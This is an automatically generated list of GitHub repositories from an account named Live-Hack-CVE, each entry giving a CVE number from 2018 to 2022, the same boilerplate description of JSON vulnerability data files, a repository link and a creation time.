**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5804 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5804](https://github.com/Live-Hack-CVE/CVE-2019-5804) create time: 2022-12-24T17:14:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5805 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5805](https://github.com/Live-Hack-CVE/CVE-2019-5805) create time: 2022-12-24T17:13:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5806 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5806](https://github.com/Live-Hack-CVE/CVE-2019-5806) create time: 2022-12-24T17:13:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5807 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5807](https://github.com/Live-Hack-CVE/CVE-2019-5807) create time: 2022-12-24T17:13:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5810 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5810](https://github.com/Live-Hack-CVE/CVE-2019-5810) create time: 2022-12-24T17:13:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5808 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5808](https://github.com/Live-Hack-CVE/CVE-2019-5808) create time: 2022-12-24T17:13:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5809 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5809](https://github.com/Live-Hack-CVE/CVE-2019-5809) create time: 2022-12-24T17:13:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5811 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5811](https://github.com/Live-Hack-CVE/CVE-2019-5811) create time: 2022-12-24T17:13:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5814 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5814](https://github.com/Live-Hack-CVE/CVE-2019-5814) create time: 2022-12-24T17:13:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5816 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5816](https://github.com/Live-Hack-CVE/CVE-2019-5816) create time: 2022-12-24T17:13:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5818 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5818](https://github.com/Live-Hack-CVE/CVE-2019-5818) create time: 2022-12-24T17:13:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5817 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5817](https://github.com/Live-Hack-CVE/CVE-2019-5817) create time: 2022-12-24T17:12:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5973 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5973](https://github.com/Live-Hack-CVE/CVE-2019-5973) create time: 2022-12-24T17:12:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5979 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5979](https://github.com/Live-Hack-CVE/CVE-2019-5979) create time: 2022-12-24T17:12:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-10433 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-10433](https://github.com/Live-Hack-CVE/CVE-2019-10433) create time: 2022-12-24T16:37:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-5429 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-5429](https://github.com/Live-Hack-CVE/CVE-2019-5429) create time: 2022-12-24T16:36:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25834 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25834](https://github.com/Live-Hack-CVE/CVE-2020-25834) create time: 2022-12-24T17:11:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8832 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8832](https://github.com/Live-Hack-CVE/CVE-2020-8832) create time: 2022-12-24T16:37:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-5247 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-5247](https://github.com/Live-Hack-CVE/CVE-2020-5247) create time: 2022-12-24T16:32:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-9876 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-9876](https://github.com/Live-Hack-CVE/CVE-2020-9876) create time: 2022-12-24T16:32:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-9906 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-9906](https://github.com/Live-Hack-CVE/CVE-2020-9906) create time: 2022-12-24T16:32:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27909 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27909](https://github.com/Live-Hack-CVE/CVE-2020-27909) create time: 2022-12-24T16:31:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-26257 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-26257](https://github.com/Live-Hack-CVE/CVE-2020-26257) create time: 2022-12-24T16:31:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25692 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25692](https://github.com/Live-Hack-CVE/CVE-2020-25692) create time: 2022-12-24T16:31:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28935 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28935](https://github.com/Live-Hack-CVE/CVE-2020-28935) create time: 2022-12-24T16:31:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27896 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27896](https://github.com/Live-Hack-CVE/CVE-2020-27896) create time: 2022-12-24T16:29:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6267 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6267](https://github.com/Live-Hack-CVE/CVE-2020-6267) create time: 2022-12-24T16:29:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27918 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27918](https://github.com/Live-Hack-CVE/CVE-2020-27918) create time: 2022-12-24T16:29:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28383 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28383](https://github.com/Live-Hack-CVE/CVE-2020-28383) create time: 2022-12-24T16:28:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40162 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40162](https://github.com/Live-Hack-CVE/CVE-2021-40162) create time: 2022-12-24T17:10:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40163 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40163](https://github.com/Live-Hack-CVE/CVE-2021-40163) create time: 2022-12-24T17:10:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40164 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40164](https://github.com/Live-Hack-CVE/CVE-2021-40164) create time: 2022-12-24T17:10:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40165 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40165](https://github.com/Live-Hack-CVE/CVE-2021-40165) create time: 2022-12-24T17:10:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40166 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40166](https://github.com/Live-Hack-CVE/CVE-2021-40166) create time: 2022-12-24T17:10:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25044 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25044](https://github.com/Live-Hack-CVE/CVE-2021-25044) create time: 2022-12-24T17:09:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-30935 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-30935](https://github.com/Live-Hack-CVE/CVE-2021-30935) create time: 2022-12-24T16:37:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-30926 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-30926](https://github.com/Live-Hack-CVE/CVE-2021-30926) create time: 2022-12-24T16:37:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-30922 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-30922](https://github.com/Live-Hack-CVE/CVE-2021-30922) create time: 2022-12-24T16:37:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-30913 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-30913](https://github.com/Live-Hack-CVE/CVE-2021-30913) create time: 2022-12-24T16:37:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-30906 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-30906](https://github.com/Live-Hack-CVE/CVE-2021-30906) create time: 2022-12-24T16:37:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-30903 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-30903](https://github.com/Live-Hack-CVE/CVE-2021-30903) create time: 2022-12-24T16:36:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-30895 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-30895](https://github.com/Live-Hack-CVE/CVE-2021-30895) create time: 2022-12-24T16:36:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-30873 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-30873](https://github.com/Live-Hack-CVE/CVE-2021-30873) create time: 2022-12-24T16:36:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-30844 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-30844](https://github.com/Live-Hack-CVE/CVE-2021-30844) create time: 2022-12-24T16:36:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-30833 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-30833](https://github.com/Live-Hack-CVE/CVE-2021-30833) create time: 2022-12-24T16:36:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36899 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36899](https://github.com/Live-Hack-CVE/CVE-2021-36899) create time: 2022-12-24T16:35:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-30928 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-30928](https://github.com/Live-Hack-CVE/CVE-2021-30928) create time: 2022-12-24T16:35:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43997 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43997](https://github.com/Live-Hack-CVE/CVE-2021-43997) create time: 2022-12-24T16:34:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41945 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41945](https://github.com/Live-Hack-CVE/CVE-2021-41945) create time: 2022-12-24T16:34:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27862 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27862](https://github.com/Live-Hack-CVE/CVE-2021-27862) create time: 2022-12-24T16:33:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27861 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27861](https://github.com/Live-Hack-CVE/CVE-2021-27861) create time: 2022-12-24T16:33:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27854 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27854](https://github.com/Live-Hack-CVE/CVE-2021-27854) create time: 2022-12-24T16:33:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41136 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41136](https://github.com/Live-Hack-CVE/CVE-2021-41136) create time: 2022-12-24T16:32:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39853 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39853](https://github.com/Live-Hack-CVE/CVE-2022-39853) create time: 2022-12-24T17:15:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39852 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39852](https://github.com/Live-Hack-CVE/CVE-2022-39852) create time: 2022-12-24T17:14:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39851 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39851](https://github.com/Live-Hack-CVE/CVE-2022-39851) create time: 2022-12-24T17:13:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39279 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39279](https://github.com/Live-Hack-CVE/CVE-2022-39279) create time: 2022-12-24T17:13:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26240 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26240](https://github.com/Live-Hack-CVE/CVE-2022-26240) create time: 2022-12-24T17:12:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36634 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36634](https://github.com/Live-Hack-CVE/CVE-2022-36634) create time: 2022-12-24T17:12:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26235 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26235](https://github.com/Live-Hack-CVE/CVE-2022-26235) create time: 2022-12-24T17:12:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26475 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26475](https://github.com/Live-Hack-CVE/CVE-2022-26475) create time: 2022-12-24T17:12:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26238 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26238](https://github.com/Live-Hack-CVE/CVE-2022-26238) create time: 2022-12-24T17:12:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26474 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26474](https://github.com/Live-Hack-CVE/CVE-2022-26474) create time: 2022-12-24T17:12:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26236 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26236](https://github.com/Live-Hack-CVE/CVE-2022-26236) create time: 2022-12-24T17:12:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41574 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41574](https://github.com/Live-Hack-CVE/CVE-2022-41574) create time: 2022-12-24T17:12:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33896 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33896](https://github.com/Live-Hack-CVE/CVE-2022-33896) create time: 2022-12-24T17:12:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39281 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39281](https://github.com/Live-Hack-CVE/CVE-2022-39281) create time: 2022-12-24T17:11:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3276 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3276](https://github.com/Live-Hack-CVE/CVE-2022-3276) create time: 2022-12-24T17:11:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26452 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26452](https://github.com/Live-Hack-CVE/CVE-2022-26452) create time: 2022-12-24T17:11:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26471 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26471](https://github.com/Live-Hack-CVE/CVE-2022-26471) create time: 2022-12-24T17:11:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26472 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26472](https://github.com/Live-Hack-CVE/CVE-2022-26472) create time: 2022-12-24T17:11:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39284 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39284](https://github.com/Live-Hack-CVE/CVE-2022-39284) create time: 2022-12-24T17:11:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26473 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26473](https://github.com/Live-Hack-CVE/CVE-2022-26473) create time: 2022-12-24T17:11:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36635 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36635](https://github.com/Live-Hack-CVE/CVE-2022-36635) create time: 2022-12-24T17:11:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39872 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39872](https://github.com/Live-Hack-CVE/CVE-2022-39872) create time: 2022-12-24T17:11:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39290 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39290](https://github.com/Live-Hack-CVE/CVE-2022-39290) create time: 2022-12-24T17:11:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39874 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39874](https://github.com/Live-Hack-CVE/CVE-2022-39874) create time: 2022-12-24T17:11:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39291 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39291](https://github.com/Live-Hack-CVE/CVE-2022-39291) create time: 2022-12-24T17:10:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39875 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39875](https://github.com/Live-Hack-CVE/CVE-2022-39875) create time: 2022-12-24T17:10:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39876 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39876](https://github.com/Live-Hack-CVE/CVE-2022-39876) create time: 2022-12-24T17:10:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39959 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39959](https://github.com/Live-Hack-CVE/CVE-2022-39959) create time: 2022-12-24T17:10:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39878 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39878](https://github.com/Live-Hack-CVE/CVE-2022-39878) create time: 2022-12-24T17:10:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41442 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41442](https://github.com/Live-Hack-CVE/CVE-2022-41442) create time: 2022-12-24T17:10:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-17954 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-17954](https://github.com/Live-Hack-CVE/CVE-2018-17954) create time: 2022-12-24T15:46:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6747 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6747](https://github.com/Live-Hack-CVE/CVE-2019-6747) create time: 2022-12-24T15:56:54Z

